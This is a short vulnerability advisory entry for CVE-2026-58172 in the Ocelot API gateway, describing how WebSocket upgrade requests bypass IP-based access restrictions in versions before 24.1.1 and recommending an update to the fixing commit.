PT-2026-53923 · Ocelot · Ocelot

George Chen

·

Published

2026-06-30

·

Updated

2026-06-30

·

CVE-2026-58172

CVSS v3.1

9.1

Critical

VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Name of the Vulnerable Software and Affected Versions Ocelot versions prior to 24.1.1
Description A security control bypass exists in the handling of WebSocket upgrade requests. The issue stems from a logic flaw in the MapWhen branch within OcelotPipelineExtensions.cs, which omits the SecurityMiddleware. This omission allows clients from blocked IP addresses to circumvent configured IP-based access restrictions. By sending a WebSocket upgrade request, an attacker can ensure their traffic is routed through the pipeline branch that skips IP restriction checks, enabling unauthorized proxying to downstream services.
Recommendations Update Ocelot to the version containing commit f156fd4.

Exploit

Fix

Authentication Bypass Using an Alternate Path or Channel

Found an issue in the description? Have something to add? Feel free to write us 👾

Weakness Enumeration

Related Identifiers

CVE-2026-58172

Affected Products

Ocelot